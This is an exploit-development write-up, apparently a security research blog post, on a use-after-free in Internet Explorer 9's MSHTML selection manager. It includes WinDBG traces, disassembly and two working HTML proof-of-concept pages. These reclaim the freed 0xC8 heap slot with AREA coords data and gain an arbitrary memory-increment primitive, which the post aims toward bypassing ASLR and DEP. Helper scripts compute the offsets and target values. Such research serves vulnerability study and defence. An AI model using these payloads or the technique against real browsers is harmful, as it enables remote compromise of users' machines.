Current Registry Settings for iexplore.exe executable are: 02001000
    ust - Create user mode stack trace database
    hpa - Enable page heap

Running the PoC again gives us the following information:

(87c.fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00008000 ebx=0e62afd8 ecx=7746389a edx=02bb10d0 esi=ffffffff edi=0ed3af38
eip=71e43f37 esp=08c9caa0 ebp=08c9cab8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
MSHTML!CSelectionManager::FireOnBeforeEditFocus+0x52:
71e43f37 334738          xor     eax,dword ptr [edi+38h] ds:002b:0ed3af70=????????

1:019> lmi vm mshtml
    File version:     9.0.8112.16446

1:021> k
ChildEBP RetAddr
08c9cab8 71e43ed1 MSHTML!CSelectionManager::FireOnBeforeEditFocus+0x52
08c9cacc 71e43e85 MSHTML!CSelectionManager::ShouldElementShowUIActiveBorder+0x2e
08c9cae4 71e4308f MSHTML!CSelectionManager::SetEditContext+0xdf
08c9cb50 71cce2fd MSHTML!CSelectionManager::SetEditContextFromElement+0x34e
08c9cb90 71ccdb7d MSHTML!CSelectionManager::SetEditContextFromCurrencyChange+0x2d6
08c9cbb8 71ef200f MSHTML!CSelectionManager::Notify+0x1e0
08c9cbcc 71ef1fc2 MSHTML!CHTMLEditor::Notify+0x5a
08c9cbe8 71ccce15 MSHTML!CHTMLEditorProxy::Notify+0x21
08c9ccd0 71d9a7a4 MSHTML!CDoc::SetCurrentElem+0x525
08c9cd2c 71ccdef8 MSHTML!CElement::BecomeCurrent+0x1d6
08c9cd60 71c51018 MSHTML!CElement::focusHelperInternal+0x109
08c9cd78 710d85fe MSHTML!CFastDOM::CHTMLElement::Trampoline_focus+0x58
08c9cdac 71116402 jscript9!Js::JavascriptFunction::CallFunction+0xc4
08c9ce00 08d804da jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x117
WARNING: Frame IP not in any known module. Following frames may be wrong.
08c9ce58 710d85fe 0x8d804da
08c9ce94 710d8523 jscript9!Js::JavascriptFunction::CallFunction+0xc4
08c9cef8 710d845a jscript9!Js::JavascriptFunction::CallRootFunction+0xb6
08c9cf34 710d83e6 jscript9!ScriptSite::CallRootFunction+0x4f
08c9cf5c 71119c8d jscript9!ScriptSite::Execute+0x63
08c9cfc0 71df27b9 jscript9!ScriptEngine::Execute+0x11a
08c9d044 71df26e3 MSHTML!CListenerDispatch::InvokeVar+0x12a
08c9d064 71e4d050 MSHTML!CListenerDispatch::Invoke+0x40
08c9d0e8 71d4e894 MSHTML!CEventMgr::_InvokeListeners+0x187
08c9d110 71e4d147 MSHTML!CEventMgr::_InvokeListenersOnWindow+0xcc
08c9d2d4 71edc03c MSHTML!CEventMgr::Dispatch+0x3cc
08c9d2fc 71df2ab0 MSHTML!CEventMgr::DispatchEvent+0xc9
08c9d330 71dc4062 MSHTML!COmWindowProxy::Fire_onload+0x123
08c9d394 71dc3c7a MSHTML!CMarkup::OnLoadStatusDone+0x5eb
08c9d3b4 71dc3c6f MSHTML!CMarkup::OnLoadStatus+0xb6
08c9d804 71d2ffbc MSHTML!CProgSink::DoUpdate+0x5dc
08c9d814 71eaa339 MSHTML!CProgSink::OnMethodCall+0x12
08c9d850 71ec9ba0 MSHTML!GlobalWndOnMethodCall+0x115

1:020> ub
MSHTML!CSelectionManager::FireOnBeforeEditFocus+0x36:
call    MSHTML!EdUtil::FireOnEvent
mov     dword ptr [ebp-8],eax
shl     eax,0Fh

I won't be going into the details and root cause analysis for this crash and will mainly focus on exploitation. The main concept is that the body's onload handler triggers the onbeforeeditfocus handler, and that handler apparently deletes some important data, which causes a crash once we return from the ‘FireOnEvent’ function.

Unfortunately the VM I’m playing on has a WinDBG version that sometimes fails the user stack trace lookup, so I cannot show you that trace at this point. I can tell you the size of the allocation however, thanks to Fermin’s subtraction technique:

1:019> .printf "size is 0x%x", 1000 - edi & 0xFFF
size is 0xc8
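For readers who have not seen the trick before, here is the same arithmetic as a Python sketch. It rests on two assumptions: that full page heap places the allocation flush against the end of a 0x1000-byte page, and that edi points at the start of the allocation. The debugger's default radix is hexadecimal, so the 1000 in the command above is 0x1000. The function name is ours.

```python
PAGE_SIZE = 0x1000


def size_from_pageheap_pointer(ptr: int) -> int:
    """Distance from ptr to the end of its page under full page heap."""
    offset_in_page = ptr & (PAGE_SIZE - 1)
    return (PAGE_SIZE - offset_in_page) & (PAGE_SIZE - 1)


# edi value taken from the page heap crash shown earlier.
size = size_from_pageheap_pointer(0x0ED3AF38)
```

Because of alignment padding the result can slightly overestimate the requested size, so treat it as an upper bound rather than an exact figure.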

So we know we are freeing a size 0xC8 piece of memory that contains some data that is being reused later on. Time to assess the exploitability of this issue, and mainly the exploitability when running with full process ASLR (no cheating as many public exploits these days seem to do).

First of all we need to check if we can replace the freed memory with our own data. Thanks to the Low Fragmentation Heap (LFH) this is pretty easy: by simply allocating 0xC8 bytes after the document.write() call we should re-occupy the last freed slot of 0xC8-sized memory. To make sure this allocation size uses the LFH allocator, we make a few allocations of this size before we start the whole fun.
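When the replacement data is a string, hitting the 0xC8 size is a matter of simple arithmetic. The sketch below assumes the string lands in its own heap block as NUL-terminated UTF-16 with no extra header, which matches the memory dump further down where the controlled data ends in a 16-bit zero. The function name is ours.

```python
def chars_for_allocation(alloc_size: int) -> int:
    """Number of UTF-16 characters whose buffer is alloc_size bytes."""
    if alloc_size < 2 or alloc_size % 2:
        raise ValueError("size must be an even number of bytes, at least 2")
    # Two bytes per character, minus one character for the terminator.
    return alloc_size // 2 - 1


needed = chars_for_allocation(0xC8)
```

Under these assumptions a 0xC8-byte block corresponds to a 99-character string.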

Setting a breakpoint at the initial crash location allows us to inspect our progress (don’t forget to turn off PageHeap to make sure the LFH allocator will be activated).

Actually, if at this point you want to stop reading and try to create the exploit yourself, go ahead and do so as spoilers are on the way.

Control

Back to the progress: taking control over freed memory:

<!doctype html>
<HTML>
  <head>
    <script>

      lfh = new Array(20);
      for(i = 0; i < lfh.length; i++) {
        lfh[i] = document.createElement('div');
        lfh[i].className = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
      }

      function setinput() {
        try { document.write('Timber'); } catch(e) {}
        d = document.createElement('div');
        d.className = "uFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFFuFFFF";
      }

      function loaded() {
        document.getElementsByTagName('input')[0].attachEvent("onbeforeeditfocus", setinput)
        document.getElementsByTagName('input')[0].focus();
      }
    </script>
  </head>
  <body onload="loaded();">
    <input value="mydata" type="text"></input>
  </body>
</html>

Let's run this and watch the effects:

1:019> bp !mshtml + 0x383f37  ".printf \"AFTER FireOnEvent : edi %p\", edi; .echo; dc edi L0xc8/4;.echo;"
AFTER FireOnEvent : edi 1072a440
1072a440  71eb2d04 71eb320c 00000002 106f4920  .-.q.2.q.... Io.
1072a450  106eff10 106eff38 107309a0 00000000  ..n.8.n...s.....
1072a460  107308e0 00000000 00000000 0000000f  ..s.............
1072a470  00000001 00000000 00908002 00000000  ................
1072a480  00000000 00000000 00000000 00000000  ................
1072a490  106c3dc0 00000000 ffffffff 00000000  .=l.............
1072a4a0  00000000 00000000 00000000 00000000  ................
1072a4b0  00000000 107309a0 00000000 00000000  ......s.........
1072a4c0  00000000 106c3dc0 1072cd88 1072ce40  .....=l...r.@.r.
1072a4d0  00000000 106efe20 106efe48 106efe70  .... .n.H.n.p.n.
1072a4e0  106efe98 106efec0 106efee8 00000000  ..n...n...n.....
1072a4f0  00000000 00000000 00000000 00000000  ................
1072a500  00000000 00000000                    ........

eax=00008000 ebx=107309a0 ecx=00000000 edx=00000001 esi=ffffffff edi=1072a440
eip=71e03f37 esp=1330cca8 ebp=1330ccc0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
MSHTML!CSelectionManager::FireOnBeforeEditFocus+0x52:
71e03f37 334738          xor     eax,dword ptr [edi+38h] ds:002b:1072a478=02809000
1:019> g
AFTER FireOnEvent : edi 1072a440
1072a440  ffffffff ffffffff ffffffff ffffffff  ................
1072a450  ffffffff ffffffff ffffffff ffffffff  ................
1072a460  ffffffff ffffffff ffffffff ffffffff  ................
1072a470  ffffffff ffffffff ffffffff ffffffff  ................
1072a480  ffffffff ffffffff ffffffff ffffffff  ................
1072a490  ffffffff ffffffff ffffffff ffffffff  ................
1072a4a0  ffffffff ffffffff ffffffff ffffffff  ................
1072a4b0  ffffffff ffffffff ffffffff ffffffff  ................
1072a4c0  ffffffff ffffffff ffffffff ffffffff  ................
1072a4d0  ffffffff ffffffff ffffffff ffffffff  ................
1072a4e0  ffffffff ffffffff ffffffff ffffffff  ................
1072a4f0  ffffffff ffffffff ffffffff ffffffff  ................
1072a500  ffffffff 0000ffff                    ........

eax=00008000 ebx=10730a60 ecx=0000005d edx=0000005c esi=ffffffff edi=1072a440
eip=71e03f37 esp=1330c960 ebp=1330c978 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
MSHTML!CSelectionManager::FireOnBeforeEditFocus+0x52:
71e03f37 334738          xor     eax,dword ptr [edi+38h] ds:002b:1072a478=ffffffff

As can be seen, we have successfully taken over the freed memory allocation (the breakpoint hits twice, and the second hit is the one where edi points at freed memory) and are now operating on data under our control. Next question is: “What now?”. First of all, this does not seem to be one of those easy ‘control virtual function table and then control program flow’ style use-after-frees. At this point you should probably dig deeper and look into what the object/memory is supposed to be before it is freed to gain more insight into what route to take toward exploitation, but we won't do that, to spare you some reading and me a lot of typing. It is also possible to create different types of crashes that might give you faster vftable control, but we’ll be working with this version since it allows us to do funny things.

We will start by just looking at the function at the point of the crash and work from there under the assumption that we control the memory in [edi]. Opening the crash location and selecting ‘edi’ at the crash point shows us that edi comes from eax at the beginning of the function.

[Image: 1-edi-assigned]

We also see that the result of the ‘EdUtil::FireOnEvent’ call is used to determine a jump at the end of the basic block:

[Image: 2-eax-jnz]

The result of the function is ‘1’, resulting in the jnz not being taken and the function ending shortly after that without using the freed data again. Of course, you really need to dig into the function and find out why it returns 1 and not 0, which gives you much more exploitation flexibility, but again: shortcut time, we’re not doing that here.

[Image: 3-jnz-to-retn]

We’ll need to go up a few functions to find a place where the freed memory is being accessed again. You can use the call stack or code cross references in IDA to do that, or step through it in WinDBG, whichever you prefer. You should be able to figure out that in “MSHTML!CSelectionManager::SetEditContext+0xf2:” the memory is used again, but nothing thereabouts seems to be too useful:


71e03e93 836738f7        and     dword ptr [edi+38h],0FFFFFFF7h ds:002b:0083b968=ffffffff

Tracing further will tell you that you’ve ended up inside CSelectionManager::EndSelectionChange with controlled memory being set to eax just before the call:

[Image: 4-Call-EndSelection]

This is where things get interesting. If you need a break from my ramblings I suggest you take a look at the function, assuming that you can control the data in eax at the beginning of the function and find an interesting path through to the epilogue. When working in a fully-ASLRed process there are a few ways that I can currently think of that will not crash:

  1. Replace freed objects with other objects so virtual calls are correctly resolved into a module
  2. Avoid any and all virtual function calls
  3. Use USER_SHARED_DATA to call LdrHotPatchRoutine

I have created a PNG of the whole function by taking a few screenshots and pasting them together in a graphics editor, mspaint.exe (there are probably better approaches to that but, hey, this worked). Use right click: open in new tab/window if your screen size isn’t big enough to read it when you click it normally.

[Image: 5-Full-EndSelection]

I highlighted ‘esi’ in the function since that is the register that points to our data. The thing that caught my eye when I was looking at this was the following code:

.text:63904388 loc_63904388:                           ; CODE XREF: CSelectionManager::EndSelectionChange(int)-22579Fj
.text:63904388                 mov     esi, [esi+0Ch]
.text:6390438B                 test    eax, eax
.text:6390438D                 jnz     loc_6378E064
.text:63904393                 inc     dword ptr [esi+0A0h]
.text:63904399                 jmp     loc_639B2DD2

If we can reach that block without crashing and with eax set to the correct value (0x0) we can INCrement whatever memory address we want. This seems somewhat limited but we’ll get back to that later. First let's try to reach that block, and once we reach the problematic situation we can worry about actual pursuit of exploitation.

If we slowly step through the function we will see what values we need to have in our controlled memory to be able to reach the code without crashing. If at this point you are working with a non-ASLR library, you will want to take a different path that leads to a virtual function table call with the pointer under your control, but that’s not what we are after.

Stepping through the function shows us:

.text:639B2DAE                 dec     dword ptr [esi+90h]
.text:639B2DB4                 mov     eax, [esi+90h]
...
.text:639B2DC3                 test    eax, eax
.text:639B2DC5                 short loc_639B2DD2

[esi+0x90] should be 0x1 at the beginning.

.text:6390282A loc_6390282A:                           ; CODE XREF: CSelectionManager::EndSelectionChange(int)+15j
.text:6390282A                 shl     ecx, 4
.text:6390282D                 xor     ecx, [esi+3Ch]
.text:63902830                 and     ecx, 10h
.text:63902833                 xor     [esi+3Ch], ecx
.text:63902836                 jmp     loc_639B2DC3
.
.
.
.text:639B2DC7                 mov     eax, [esi+3Ch]
.text:639B2DCA                 test    al, 10h
.text:639B2DCC                 jnz     loc_63904352

[esi+0x3C] needs to pass some test for 0x10, so we’ll just poke at that until it complies.

The block of code we want to reach requires eax to be 0x0 to take the right jump. For this to happen we need to trace back where eax is being set and figure out which path we need to walk to get there. There are two places right above the block we want to reach that can set eax:

loc_6378D607:
mov     eax, edi

and

.text:6390437C                 test    byte ptr [esi+3Ch], 2
.text:63904380                 jnz     loc_6378D607
.text:63904386                 xor     eax, eax

A little inspection shows that edi will be non-zero at the point where edi is moved to eax, so the only route we can take is the ‘xor eax, eax’ path. To reach this we need to survive two additional functions, ‘CSelectionManager::GetTrackerType’ and ‘CSelectionManager::ShouldCaretBeInteractive’, and both need to return the right values. This can be achieved without too much hassle.
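
The choice between the two eax assignments can be summarised in a few lines. This is only a model of the listing above (the function name is hypothetical), but it makes the requirement on [esi+3Ch] explicit: bit 0x2 must be clear.

```javascript
// Hypothetical model of the check at 6390437C.
// flags is the dword at [esi+3Ch]; edi is whatever edi holds at that point.
function eaxBeforeInc(flags, edi) {
	if ((flags & 0x2) !== 0) {
		return edi >>> 0;   // jnz taken: loc_6378D607, mov eax, edi
	}
	return 0;               // fall through: xor eax, eax
}
```

For a flags value of 13 (0x0D) the function returns 0 regardless of edi, which is the case we are after.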

CSelectionManager::GetTrackerType should return either 1 or 2 which can be achieved by having our data + 0x50 point to memory where at offset 0xC you can find the value 0x1 or 0x2:

[Image: CTrackerType]

The other function, CSelectionManager::ShouldCaretBeInteractive, is a little more complex, but can also be navigated without the process crashing. I will not walk you through that, but will instead point out that you can find a value of 0x1 inside USER_SHARED_DATA at 0x7ffe0240. I think it’s about time to test a proof of concept that will allow us to INC dword ptr [0xCONTROLLED] and then go from there.

To do this we need to be able to allocate a 0xC8-sized piece of memory and fill it with data under our control, including values of \u0000 (we need 0x1 at offset +0x90). The element.className trick we used in our previous sample won’t cut it, since the string will terminate at the first \u0000 it encounters. There are, however, plenty more ways to have some fun with the heap in Internet Explorer 9. One of the tricks I like to use consists of the following lines of code:

a = document.createElement('area');
a.shape = 'poly';
a.coords = '1,2,3,4,5,6,7,8,9,10';

This snippet creates an AREA element, sets its shape to be a polygon and then assigns a list of points (x,y) to its ‘coords’ property. This results in an allocation that consists of:
[NUMBER_OF_POINTS][X][Y][X][Y]… with all the values converted to double words (4 bytes each). Using this we do not control the first 4 bytes of the allocation, but we can easily control the rest and set it to the values we want. This results in the proof of concept shown below:

<!doctype html>
<HTML>
	<head>
		<script>
			lfh = new Array(20);
			for(i = 0; i < lfh.length; i++) {
				lfh[i] = document.createElement('div');
				lfh[i].className = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
			}

			function setinput() {
				try { document.write('Timber'); } catch(e) {}
				d = document.createElement('area');
				d.shape = "poly";
				d.coords = "1,2,606348324,4,5,0,7,8,9,10,11,12,13,14,13,16,17,18,19,2147353180,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,1,37,38,39,40,41,42,43,44,45,46,47,48";
			}

			function loaded() {
				document.getElementsByTagName('input')[0].attachEvent("onbeforeeditfocus", setinput);
				document.getElementsByTagName('input')[0].focus();
			}
		</script>
	</head>
	<body onload="loaded();">
		<input value="ExodusIntel" type="text"></input>
	</body>
</html>
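
The long coords string in the proof of concept is easier to read as a list of offset/value pairs. The sketch below rebuilds it under the layout described earlier: a 4-byte point count followed by one double word per coordinate, so that the coordinate at index i lands at byte offset 4 + 4*i. The helper name and the filler scheme (each slot defaults to its 1-based position) are my own choices for illustration; only the resulting string matters.

```javascript
// Hypothetical helper: build an AREA coords string from {byteOffset: value}.
function buildCoords(count, overrides) {
	var values = [];
	for (var i = 0; i < count; i++) {
		values.push(i + 1);               // filler: 1, 2, 3, ...
	}
	for (var key in overrides) {
		if (!overrides.hasOwnProperty(key)) continue;
		var offset = Number(key);
		// Offset 0 holds the point count, which we do not control.
		if (offset < 4 || offset % 4 !== 0 || offset >= 4 + 4 * count) {
			throw new Error('cannot place a value at offset ' + offset);
		}
		values[(offset - 4) / 4] = overrides[key] >>> 0;
	}
	return values.join(',');
}

var pocCoords = buildCoords(48, {
	0x0C: 0x24242424,   // the value that shows up in esi in the crash
	0x18: 0,            // zeroed in the PoC; its purpose is not covered in the text
	0x3C: 13,           // flags dword; bit 0x2 is clear
	0x50: 0x7ffe025c,   // pointer whose +0xC is read by GetTrackerType
	0x90: 1             // counter that 'dec dword ptr [esi+90h]' brings to 0
});
```

pocCoords comes out identical to the string assigned to d.coords in the page, so changing a single offset here is a convenient way to experiment with the layout.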

Loading the proof of concept causes the following crash in IE:

(638.104): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=131ec89c edx=00000033 esi=24242424 edi=00000001
eip=71e04393 esp=131ec8a0 ebp=131ec8d8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!CSelectionManager::EndSelectionChange+0x87:
71e04393 ff86a0000000    inc     dword ptr [esi+0A0h] ds:002b:242424c4=????????

So there you have it: our exploit primitive allows us to INCrement the data at a single 4-byte address of our choosing. Is that enough to:

  1. Force a memory disclosure needed to bypass ASLR
  2. Control the flow of the execution with enough control to bypass DEP

The answer is of course yes; otherwise I wouldn’t be writing this blog post. As a matter of fact, I found two somewhat distinct ways to do this.

And… my time is up for this week. I will write the follow-up with at least one exploit and publish it next week after Thanksgiving. Anyone who sends me either a workable idea or, even better, an actual working exploit will get a shoutout in Part 2.

A few notes on the exploit I wrote:

  • Due to the requirements on our memory replacement (size 0xC8, some specific values at certain offsets) we’re almost certainly stuck with a ‘fixed’ address as the memory address we can INC. Feel free to add a heapspray if you need one.
  • We will only trigger the ‘crash’ once, so the initial exploit primitive of INC[memory] has to serve for both the memory disclosure and the process control that follows it.
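
For anyone who wants to experiment with that fixed address: the crash dump suggests that the double word at offset 0xC of our replacement data ends up in esi, and the INC then hits esi + 0xA0. Under that assumption (it is inferred from the dump, not verified separately), the value to plant for a given target address can be computed with a small helper like this one, whose name is again made up:

```javascript
// Hypothetical helper: which value must sit in esi so that
// 'inc dword ptr [esi+0A0h]' hits the given 32-bit target address?
function esiForIncTarget(target) {
	return (target - 0xA0) >>> 0;   // wrap to an unsigned 32-bit value
}

// Decimal form, as it would be written into the coords string.
function esiCoordForIncTarget(target) {
	return String(esiForIncTarget(target));
}
```

Feeding it the faulting address from the dump, 0x242424c4, gives back 0x24242424, the value used in the proof of concept.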

To be continued….